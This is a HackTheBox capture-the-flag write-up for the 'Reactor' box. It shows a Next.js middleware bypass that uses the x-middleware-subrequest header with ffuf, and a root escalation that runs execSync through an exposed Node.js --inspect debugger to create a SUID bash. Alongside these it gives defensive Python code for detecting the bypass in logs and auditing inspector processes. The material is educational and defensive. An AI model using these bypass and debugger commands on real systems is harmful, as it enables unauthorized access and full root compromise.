Write Up

Reactor

HackTheBox Easy Linux

Overview

Reactor is a medium Linux box built around a Next.js application. The foothold exploits a well-known Next.js middleware authentication bypass using the x-middleware-subrequest header to access protected internal routes. Privilege escalation abuses a Node.js process running with the --inspect flag as root, allowing debugger attachment and arbitrary code execution in the root context.

Enumeration

Nmap Scan

nmap -sC -sV -oN reactor_initial.txt reactor.htb

Two ports open:

Next.js Middleware Bypass

The application protected most routes through Next.js middleware, returning the default 17175-byte page for any unauthenticated request. The x-middleware-subrequest header tricks Next.js into treating the request as an internal subrequest, skipping middleware execution entirely:

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
  -u http://reactor.htb:3000/FUZZ \
  -H "x-middleware-subrequest: middleware" \
  -mc 200,201,301,302,307,401,403 \
  -fs 17175 -t 80

With the bypass header in place, previously inaccessible routes became reachable, revealing internal API endpoints and admin functionality.
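A defender-side counterpart, added here as an example and not code from the original write-up: the header is one Next.js sets on its own internal subrequests, so a copy arriving from a client is never legitimate. The script below (the JSON request-log shape, paths and addresses are constructed for this page) flags such requests in proxy logs and shows the header-stripping an edge proxy should apply before forwarding to the application.

```python
import json

# The header Next.js uses internally to mark a middleware subrequest.
# A request arriving from outside carrying it is never legitimate.
INTERNAL_HEADER = "x-middleware-subrequest"

# Constructed sample log lines (JSON, one request per line) in the shape a
# reverse proxy or application logger might emit; not from the write-up.
SAMPLE_LOG = """\
{"ts":"2024-01-01T10:00:00Z","src":"203.0.113.5","method":"GET","path":"/admin","status":200,"headers":{"user-agent":"Mozilla/5.0","x-middleware-subrequest":"middleware"}}
{"ts":"2024-01-01T10:00:01Z","src":"203.0.113.5","method":"GET","path":"/api/users","status":200,"headers":{"user-agent":"curl/8.0","X-Middleware-Subrequest":"middleware:middleware:middleware"}}
{"ts":"2024-01-01T10:00:02Z","src":"198.51.100.20","method":"GET","path":"/login","status":200,"headers":{"user-agent":"Mozilla/5.0"}}
{"ts":"2024-01-01T10:00:03Z","src":"198.51.100.20","method":"GET","path":"/dashboard","status":307,"headers":{"user-agent":"Mozilla/5.0"}}
"""


def carries_internal_header(headers: dict) -> bool:
    """True if the request carries the internal subrequest header, in any letter case."""
    return any(name.lower() == INTERNAL_HEADER for name in headers)


def strip_internal_headers(headers: dict) -> dict:
    """Return a copy of the headers with the internal marker removed.
    This is what an edge proxy or WAF should do before forwarding to Next.js."""
    return {k: v for k, v in headers.items() if k.lower() != INTERNAL_HEADER}


def find_bypass_attempts(log_text: str) -> list:
    """Scan JSON request logs and return one finding per request that carried
    the internal header. A 200 on a route that normally redirects or denies
    unauthenticated users is the strongest sign the bypass actually worked."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if carries_internal_header(rec.get("headers", {})):
            findings.append({
                "ts": rec["ts"],
                "src": rec["src"],
                "path": rec["path"],
                "status": rec["status"],
                "served_protected_content": rec["status"] == 200,
            })
    return findings


if __name__ == "__main__":
    for finding in find_bypass_attempts(SAMPLE_LOG):
        print(finding)
```

On nginx the equivalent of `strip_internal_headers` is `proxy_set_header x-middleware-subrequest "";` in the location that proxies to the app, since an empty value drops the header from the proxied request. The detection half is worth running retroactively over existing logs: a 200 on a route that normally answers unauthenticated clients with a redirect is the clearest trace of this bypass.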

Foothold

Browsing internal routes with the bypass header provided access to authenticated application features. Credentials or session material obtained from the exposed endpoints allowed a foothold as a low-privilege user on the system.

Privilege Escalation — Node.js Inspector as Root

Post-exploitation enumeration revealed a Node.js process running as root with the --inspect flag, exposing a debugger on 127.0.0.1:9229:

curl -s http://127.0.0.1:9229/json/list

The Node.js inspector protocol allows attaching a debugger and executing JavaScript in the context of the target process. Since the process ran as root, any code executed through it runs as root:

node inspect 127.0.0.1:9229

Inside the debugger REPL, exec() was used to copy bash and set the SUID bit:

exec('global.process.mainModule.require("child_process").execSync("cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash").toString()')

After exiting the debugger:

/tmp/rootbash -p

A root shell was obtained. Both flags were retrieved.
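As an added host-audit check (not part of the write-up; the `ps` and `ss` samples, paths and pids are constructed), the script below parses `ps -eo user,pid,args --no-headers` and `ss -ltnp` output and reports every Node process started with an inspect flag, rating a root-owned inspector as critical and one bound to a non-loopback address as high.

```python
import os
import re
import shlex

# Node flags that open the inspector: --inspect, --inspect-brk, --inspect-wait,
# each optionally with =host:port. Audit logic constructed for this page.
INSPECT_FLAG = re.compile(r"^--inspect(-brk|-wait)?(=.*)?$")

# Constructed sample of `ps -eo user,pid,args --no-headers` output.
SAMPLE_PS = """\
root         1 /sbin/init
root       812 /usr/bin/node --inspect /opt/reactor/worker.js
reactor    915 node /opt/reactor/.next/server.js
www-data  1020 /usr/bin/node --inspect=0.0.0.0:9229 /srv/app/index.js
root      1100 /usr/sbin/sshd -D
"""

# Constructed sample of `ss -ltnp` output.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      511    127.0.0.1:9229      0.0.0.0:*         users:(("node",pid=812,fd=20))
LISTEN 0      511    0.0.0.0:9229        0.0.0.0:*         users:(("node",pid=1020,fd=20))
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=1100,fd=3))
"""


def inspect_processes(ps_text: str) -> list:
    """Return (user, pid, bind) for every node process started with an inspect flag.
    bind is the explicit --inspect=host:port value, else Node's default 127.0.0.1:9229."""
    found = []
    for line in ps_text.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        user, pid, args = parts
        argv = shlex.split(args)
        if not argv or os.path.basename(argv[0]) != "node":
            continue
        for arg in argv[1:]:
            m = INSPECT_FLAG.match(arg)
            if m:
                bind = m.group(2)[1:] if m.group(2) else "127.0.0.1:9229"
                found.append((user, int(pid), bind))
                break
    return found


def inspector_listeners(ss_text: str) -> dict:
    """Map pid -> local address for listening sockets owned by a node process."""
    listeners = {}
    for line in ss_text.splitlines():
        if not line.startswith("LISTEN"):
            continue
        cols = line.split()
        m = re.search(r'\("node",pid=(\d+)', line)
        if m:
            listeners[int(m.group(1))] = cols[3]
    return listeners


def audit(ps_text: str, ss_text: str) -> list:
    """Combine both views. CRITICAL when the inspector belongs to root (anyone able
    to reach the socket gets root), HIGH when it is bound beyond loopback, else MEDIUM."""
    listeners = inspector_listeners(ss_text)
    findings = []
    for user, pid, bind in inspect_processes(ps_text):
        local = listeners.get(pid, bind)
        host = local.rsplit(":", 1)[0]
        if user == "root":
            severity = "CRITICAL"
        elif host not in ("127.0.0.1", "[::1]", "localhost"):
            severity = "HIGH"
        else:
            severity = "MEDIUM"
        findings.append({"pid": pid, "user": user, "listen": local, "severity": severity})
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_PS, SAMPLE_SS):
        print(finding)
```

On a live host, feed the two functions the real command output (for example via `subprocess.run`). The fix for a critical finding is to remove the flag from the service definition; where a debugger is genuinely needed, run the process as an unprivileged user with the default loopback bind, and treat port 9229 in any listening-socket inventory as a finding to explain.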

Key Takeaways

The Next.js middleware bypass (x-middleware-subrequest: middleware) has been a known issue affecting a wide range of Next.js versions and is trivial to exploit — a single header bypasses entire authentication layers built on middleware. Running a Node.js process with --inspect as root is equivalent to leaving a root shell open on localhost; any user able to connect to port 9229 gets arbitrary code execution as root.